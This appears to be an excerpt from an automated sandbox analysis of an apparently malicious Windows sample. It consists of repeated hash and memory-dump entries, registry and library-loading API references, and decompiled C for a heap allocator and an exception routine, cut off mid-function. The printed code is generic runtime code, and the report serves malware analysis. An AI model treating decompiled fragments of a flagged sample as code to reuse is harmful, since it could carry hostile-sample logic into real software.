                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: a07743617ade0ce783ed64826fd8d77ae8cc31de46ab476315b2c990ed24bdbd
                                                                                            • Instruction ID: 8c06aea05035e89536c88cbf73aaaff8e4ef1f8f586048ee066b9fb716af534e
                                                                                            • Opcode Fuzzy Hash: a07743617ade0ce783ed64826fd8d77ae8cc31de46ab476315b2c990ed24bdbd
                                                                                            • Instruction Fuzzy Hash: E2C12BB4A01228CFCB24DB24C95479DBBB6BF88306F5084E9D609A7741CF359E85CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 32ed80647bcfa7ddc3e1cd38c3698ff9bd5739dccebfe6f5b143aac9ce05d184
                                                                                            • Instruction ID: 71491daa23ccc34ef670e4b58e0f5a0d60b4cc4732d0d9dc1bb6b6ee777441f9
                                                                                            • Opcode Fuzzy Hash: 32ed80647bcfa7ddc3e1cd38c3698ff9bd5739dccebfe6f5b143aac9ce05d184
                                                                                            • Instruction Fuzzy Hash: 2DC12AB4A01228CFCB24DB24C95479DBBB6BF88306F5084E9D609A7741CF359E85CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: e8cc0fa556089a9b295f98146006f591027d849dc3b6d433d300fa029e20e94e
                                                                                            • Instruction ID: 2ba15153b9e9b9f33f0d761d1efa7e471148624aac9a3b7648fce5c9062672ec
                                                                                            • Opcode Fuzzy Hash: e8cc0fa556089a9b295f98146006f591027d849dc3b6d433d300fa029e20e94e
                                                                                            • Instruction Fuzzy Hash: E8B13CB4A01228CFCB24DB24C95479DBBB6BF88306F5084E9D609A7741CF399E85CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: d7993268e02468d2d621ff059b297b118a644ef7bcc9e2410987f60bf7a694ac
                                                                                            • Instruction ID: 546312cdb674a45ddc81227506653e70ef551321894a84b4d33dcc5ed2f5d02f
                                                                                            • Opcode Fuzzy Hash: d7993268e02468d2d621ff059b297b118a644ef7bcc9e2410987f60bf7a694ac
                                                                                            • Instruction Fuzzy Hash: D0B12BB4A01228CFCB24DB64C95479DBBB6BF88306F5084E9D609A7740CF399E85CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 815c47b5c94e59aa3fb942d3fe1e42cc6b725aeb5ed040c774a7f5fcf90f077e
                                                                                            • Instruction ID: ca58f32a8dc2ee3a6f951ed5cccb5a36e9811bb38b7ae61684818e231f017332
                                                                                            • Opcode Fuzzy Hash: 815c47b5c94e59aa3fb942d3fe1e42cc6b725aeb5ed040c774a7f5fcf90f077e
                                                                                            • Instruction Fuzzy Hash: 41B14CB4A01228CFCB24DB64C95479DBBB6BF88306F5084E9D609A7740CF399E85CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: e9c136e11967e594a28275f7e540685d987c0c81d1d015df2df266d576301caf
                                                                                            • Instruction ID: 175bcaf1e989a40a726700524b8b093fcbd3c45acecb8cf2d89fa53ecad05493
                                                                                            • Opcode Fuzzy Hash: e9c136e11967e594a28275f7e540685d987c0c81d1d015df2df266d576301caf
                                                                                            • Instruction Fuzzy Hash: 49A14DB4A01228CFCB24DB64C9547AD7BB6BF88306F5084E9D609A7740CF389E85CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 71a494dbd59feed5617a713d1eb01069879b06892ed411d5a639796bbf56cd9b
                                                                                            • Instruction ID: dfd8f05e9cab08e20e8764192c062eea68e8ca1c5b4393bedc1153d2f099fffc
                                                                                            • Opcode Fuzzy Hash: 71a494dbd59feed5617a713d1eb01069879b06892ed411d5a639796bbf56cd9b
                                                                                            • Instruction Fuzzy Hash: 48A14DB4A01229CFCB24DB64C9547AD7BB6BF84306F5084E9D609A7740CF389E85CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 88d94049dbd74346a4507595e9501844a73298b17f3341f339323da9cebf67f0
                                                                                            • Instruction ID: 040f55cbe5e79d88017ff3c231f63f98e91e57a4cc5161fa204908fe4a873fd7
                                                                                            • Opcode Fuzzy Hash: 88d94049dbd74346a4507595e9501844a73298b17f3341f339323da9cebf67f0
                                                                                            • Instruction Fuzzy Hash: 68A14EB4A01228CFCB24DB64C9547AD7BB6BF84306F5084E9D609A7740CF389E85CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: af9e2d70d075b217f6e3c2d283892b01a6c246f8fc3aa6164f77dfe861f77241
                                                                                            • Instruction ID: b3c78a06cbc05fc448fee1d1b9268e9fca534e3c2ec808a902dbf4945a291b63
                                                                                            • Opcode Fuzzy Hash: af9e2d70d075b217f6e3c2d283892b01a6c246f8fc3aa6164f77dfe861f77241
                                                                                            • Instruction Fuzzy Hash: 09914DB4A01229CFCB24EB64C9547AD7BB6BF84306F5084E9D609A7740CF349E85CF59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 791a77b0061ea6a40022f5f3d6bcdc9b71c32c1c5cbd15a4811d881c7eb013e0
                                                                                            • Instruction ID: 8a3025b652d7eeee986400a902cdff595058f9562c193c9c6652bc0614eb2071
                                                                                            • Opcode Fuzzy Hash: 791a77b0061ea6a40022f5f3d6bcdc9b71c32c1c5cbd15a4811d881c7eb013e0
                                                                                            • Instruction Fuzzy Hash: D2915EB4A01229CFCB24EB64C9587ADBBB6BF84306F5084E9D609A7740CF349E85CF55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 2fa8d7f9344868d963426abcbb337b8a688661beb9b636e6660ecd874dc16cac
                                                                                            • Instruction ID: bd20d9364fbaad980abf842db946963ce27c486fb6cde71e296b901e53c35653
                                                                                            • Opcode Fuzzy Hash: 2fa8d7f9344868d963426abcbb337b8a688661beb9b636e6660ecd874dc16cac
                                                                                            • Instruction Fuzzy Hash: BD815EB4A01229CFCB24EB64C9587ADBBB6BF84306F5084E9D609A7740CF349E85CF55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 235ae3a606a51b947b32a69911fa487295a6084aab1631ec0dbefd78e536980d
                                                                                            • Instruction ID: 5a4453adbddf358825a908bc5b256cb3dcba5ba2d3ec7971019313c52f8bb7af
                                                                                            • Opcode Fuzzy Hash: 235ae3a606a51b947b32a69911fa487295a6084aab1631ec0dbefd78e536980d
                                                                                            • Instruction Fuzzy Hash: 05814EB4A01229CFCB24EB64C9587ADBBB6BF84306F5084E9D609A7740CF349D85CF55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 72dded97cf1294ea35327369de9d25d8a550d0286ace8e21dfc8ab600225cdf8
                                                                                            • Instruction ID: 7a1dac41b000b8d52a30eb5fe5c7f0fa103a52d717507f829a4eb3ee442b35bd
                                                                                            • Opcode Fuzzy Hash: 72dded97cf1294ea35327369de9d25d8a550d0286ace8e21dfc8ab600225cdf8
                                                                                            • Instruction Fuzzy Hash: 2E714FB4A01229CFCB24EB74C9587AD7BB6AF84306F5084E9D609A7740CF348D86CF55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 8038e1c93ced6420ffcd05c2f20cbb6dbc84e39ff214a89475aa85229b11cefe
                                                                                            • Instruction ID: 79debca3f176b2f13652eff9802e9ee5fdefb66ebc48ee8e2e5a194f45935b85
                                                                                            • Opcode Fuzzy Hash: 8038e1c93ced6420ffcd05c2f20cbb6dbc84e39ff214a89475aa85229b11cefe
                                                                                            • Instruction Fuzzy Hash: 887140B4A00229CFCB24EB74C958BAD76B6AF84306F5084E9D609A7780DF348D86CF55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 00711A4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923132404.0000000000710000.00000040.00000010.sdmp, Offset: 00710000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_710000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: DispatcherExceptionUser
                                                                                            • String ID:
                                                                                            • API String ID: 6842923-0
                                                                                            • Opcode ID: 64cfb914039ad6c1615f449be6071b6ebedfaf71ce34364e18ea62b2e248f098
                                                                                            • Instruction ID: a5c62f10f44fee253bfae47d38056a391e246eff515bec295f3ca214bc471ebf
                                                                                            • Opcode Fuzzy Hash: 64cfb914039ad6c1615f449be6071b6ebedfaf71ce34364e18ea62b2e248f098
                                                                                            • Instruction Fuzzy Hash: 72615FB4A00229CFCB24EB74C958BAD76B6AF84306F5484E9D509A7780DF348D86CF55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923202403.00000000008C0000.00000040.00000010.sdmp, Offset: 008C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8c0000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aaee9114c9bfee4b52b70ac671e8c2e3c331d80f7f78e5bc7f5844ee6dbf65be
                                                                                            • Instruction ID: 467e60ae5b89ece827da6b2fd60580017603b6a0b18d381c936d49e8a5a83ae0
                                                                                            • Opcode Fuzzy Hash: aaee9114c9bfee4b52b70ac671e8c2e3c331d80f7f78e5bc7f5844ee6dbf65be
                                                                                            • Instruction Fuzzy Hash: 2D41EF71D043998FCB05CFBAC8047DABBB5EF8A314F08856BD444EB251DB749845CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0046E679
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922875999.0000000000460000.00000040.00000010.sdmp, Offset: 00460000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_460000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: 64b70088f74975c54e479c4b951d6048e7af64b7274d8734f9ab45b04b53d572
                                                                                            • Instruction ID: 3f2a8d14e14f87a2c868aad35ef336f876e58f2635db57173948df96592d49d0
                                                                                            • Opcode Fuzzy Hash: 64b70088f74975c54e479c4b951d6048e7af64b7274d8734f9ab45b04b53d572
                                                                                            • Instruction Fuzzy Hash: 2341F2B5D002589FCB20CF9AC984ACEBFF5BF48300F55812AE819AB350D7749906CF55
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 0046E40C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922875999.0000000000460000.00000040.00000010.sdmp, Offset: 00460000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_460000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: 99acb0cef088a6bb2bd55bb6504b0afe978a1be3452da7dd9ad13f11a699396b
                                                                                            • Instruction ID: 4a73355bc9de83d16f77937e52b54f024eeca4fa9669432afe136fd1f7144dd8
                                                                                            • Opcode Fuzzy Hash: 99acb0cef088a6bb2bd55bb6504b0afe978a1be3452da7dd9ad13f11a699396b
                                                                                            • Instruction Fuzzy Hash: 6E3112B49002498FDB10CFA9C588ACEFBF5BF48304F28856AD809AB341D7759945CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0046E679
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922875999.0000000000460000.00000040.00000010.sdmp, Offset: 00460000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_460000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: 5a8b5ab3e2c97bc4fa2b2f90d322a5df6eefc1763c88020484b4fb1d1a605cd6
                                                                                            • Instruction ID: 6bcce6ea723b7ef245da1ff7a9acd80dc8740d6e67a600cdf1a21e99df4c4068
                                                                                            • Opcode Fuzzy Hash: 5a8b5ab3e2c97bc4fa2b2f90d322a5df6eefc1763c88020484b4fb1d1a605cd6
                                                                                            • Instruction Fuzzy Hash: 0C31DEB5D002589FCB10CF9AC984ACEBBF5BF48714F64802AE819AB350D7749906CF95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 0046E40C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922875999.0000000000460000.00000040.00000010.sdmp, Offset: 00460000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_460000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: 2cfafcc19e84a7b0b13b3b33a41ded689c6e4286ae0a1b3e1e53e956cfc45c89
                                                                                            • Instruction ID: 446969f9ab69f0c7cff5edb53790c1c045718234d851146b423be14bbd40df3d
                                                                                            • Opcode Fuzzy Hash: 2cfafcc19e84a7b0b13b3b33a41ded689c6e4286ae0a1b3e1e53e956cfc45c89
                                                                                            • Instruction Fuzzy Hash: EE31F0B4D002498FDB10CFA9C588A8EFBF5BF48304F28C56AE809AB351D7799945CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,008CAC11,00000800), ref: 008CACA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923202403.00000000008C0000.00000040.00000010.sdmp, Offset: 008C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8c0000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 8d974b3f799bff72982c656a6d993466397302eeb1d10268344857aaf682bd64
                                                                                            • Instruction ID: c3cd66e8a10aec0e24bdbfcaf0de75b63f478cc224111223ef80d32e5b2d5a13
                                                                                            • Opcode Fuzzy Hash: 8d974b3f799bff72982c656a6d993466397302eeb1d10268344857aaf682bd64
                                                                                            • Instruction Fuzzy Hash: 4F11C2B69042099FDB14CF9AD448BDEFBF4FB98314F14842ED815A7610C379A945CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,008CAC11,00000800), ref: 008CACA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923202403.00000000008C0000.00000040.00000010.sdmp, Offset: 008C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8c0000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 97079de4803937bce9b979d796236d65a1b0a35d7f070a3e01ee096bc526aa01
                                                                                            • Instruction ID: f7de54d37df2d6831764e155e7ecbe64a97a10ae91278eb354b0ff16d379454b
                                                                                            • Opcode Fuzzy Hash: 97079de4803937bce9b979d796236d65a1b0a35d7f070a3e01ee096bc526aa01
                                                                                            • Instruction Fuzzy Hash: D211F2B69002498FDB14CFAAD484BDEFBF4FB88314F14852ED815A7600C379A949CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?), ref: 008C0247
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.923202403.00000000008C0000.00000040.00000010.sdmp, Offset: 008C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8c0000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: GlobalMemoryStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1890195054-0
                                                                                            • Opcode ID: cc99fb770b35e7961c257601a44df86ec9b9dee74af98821dd75255471fbb909
                                                                                            • Instruction ID: d8108cc8b3841b62d090d2ff1a51ad91dcb477c0a9949098c433828705245331
                                                                                            • Opcode Fuzzy Hash: cc99fb770b35e7961c257601a44df86ec9b9dee74af98821dd75255471fbb909
                                                                                            • Instruction Fuzzy Hash: B811D0B1C006199FDB10CF9AC448BDEFBB8FF48224F14852AD818B7240D378A955CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 94%
                                                                                            			E00403E3D(void* __ecx, long _a4) {
                                                                                            				void* _t4;
                                                                                            				void* _t6;
                                                                                            				void* _t7;
                                                                                            				long _t8;
                                                                                            
                                                                                            				_t7 = __ecx;
                                                                                            				_t8 = _a4;
                                                                                            				if(_t8 > 0xffffffe0) {
                                                                                            					L7:
                                                                                            					 *((intOrPtr*)(E00404831())) = 0xc;
                                                                                            					__eflags = 0;
                                                                                            					return 0;
                                                                                            				}
                                                                                            				if(_t8 == 0) {
                                                                                            					_t8 = _t8 + 1;
                                                                                            				}
                                                                                            				while(1) {
                                                                                            					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
                                                                                            					if(_t4 != 0) {
                                                                                            						break;
                                                                                            					}
                                                                                            					__eflags = E00403829();
                                                                                            					if(__eflags == 0) {
                                                                                            						goto L7;
                                                                                            					}
                                                                                            					_t6 = E004068FD(_t7, __eflags, _t8);
                                                                                            					_pop(_t7);
                                                                                            					__eflags = _t6;
                                                                                            					if(_t6 == 0) {
                                                                                            						goto L7;
                                                                                            					}
                                                                                            				}
                                                                                            				return _t4;
                                                                                            			}







                                                                                            0x00403e3d
                                                                                            0x00403e43
                                                                                            0x00403e49
                                                                                            0x00403e7b
                                                                                            0x00403e80
                                                                                            0x00403e86
                                                                                            0x00000000
                                                                                            0x00403e86
                                                                                            0x00403e4d
                                                                                            0x00403e4f
                                                                                            0x00403e4f
                                                                                            0x00403e66
                                                                                            0x00403e6f
                                                                                            0x00403e77
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403e57
                                                                                            0x00403e59
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403e5c
                                                                                            0x00403e61
                                                                                            0x00403e62
                                                                                            0x00403e64
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403e64
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.922818649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_O53TFikPkp.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                                            • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                                                                                            • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                                                                            • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            C-Code - Quality: 74%
                                                                                            			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                            				char _v0;
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v524;
                                                                                            				intOrPtr _v528;
                                                                                            				void* _v532;
                                                                                            				intOrPtr _v536;
                                                                                            				char _v540;
                                                                                            				intOrPtr _v544;
                                                                                            				intOrPtr _v548;
                                                                                            				intOrPtr _v552;
                                                                                            				intOrPtr _v556;
                                                                                            				intOrPtr _v560;
                                                                                            				intOrPtr _v564;
                                                                                            				intOrPtr _v568;
                                                                                            				intOrPtr _v572;
                                                                                            				intOrPtr _v576;
                                                                                            				intOrPtr _v580;
                                                                                            				intOrPtr _v584;
                                                                                            				char _v724;
                                                                                            				intOrPtr _v792;
                                                                                            				intOrPtr _v800;
                                                                                            				char _v804;
                                                                                            				struct _EXCEPTION_POINTERS _v812;
                                                                                            				void* __edi;
                                                                                            				signed int _t40;
                                                                                            				char* _t47;
                                                                                            				char* _t49;
                                                                                            				long _t57;
                                                                                            				intOrPtr _t59;
                                                                                            				intOrPtr _t60;
                                                                                            				intOrPtr _t64;
                                                                                            				intOrPtr _t65;
                                                                                            				int _t66;
                                                                                            				intOrPtr _t68;
                                                                                            				signed int _t69;
                                                                                            
                                                                                            				_t68 = __esi;
                                                                                            				_t64 = __edx;
                                                                                            				_t59 = __ebx;
                                                                                            				_t40 =  *0x412014; // 0x471e291c
                                                                                            				_t41 = _t40 ^ _t69;
                                                                                            				_v8 = _t40 ^ _t69;
                                                                                            				_push(_t65);
                                                                                            				if(_a4 != 0xffffffff) {
                                                                                            					_push(_a4);
                                                                                            					E00401E6A(_t41);
                                                                                            					_pop(_t60);
                                                                                            				}
                                                                                            				E00402460(_t65,  &_v804, 0, 0x50);
                                                                                            				E00402460(_t65,  &_v724, 0, 0x2cc);
                                                                                            				_v812.ExceptionRecord =  &_v804;
                                                                                            				_t47 =  &_v724;
                                                                                            				_v812.ContextRecord = _t47;
                                                                                            				_v548 = _t47;
                                                                                            				_v552 = _t60;
                                                                                            				_v556 = _t64;
                                                                                            				_v560 = _t59;
                                                                                            				_v564 = _t68;
                                                                                            				_v568 = _t65;
                                                                                            				_v524 = ss;
                                                                                            				_v536 = cs;
                                                                                            				_v572 = ds;
                                                                                            				_v576 = es;
                                                                                            				_v580 = fs;
                                                                                            				_v584 = gs;
                                                                                            				asm("pushfd");
                                                                                            				_pop( *_t22);
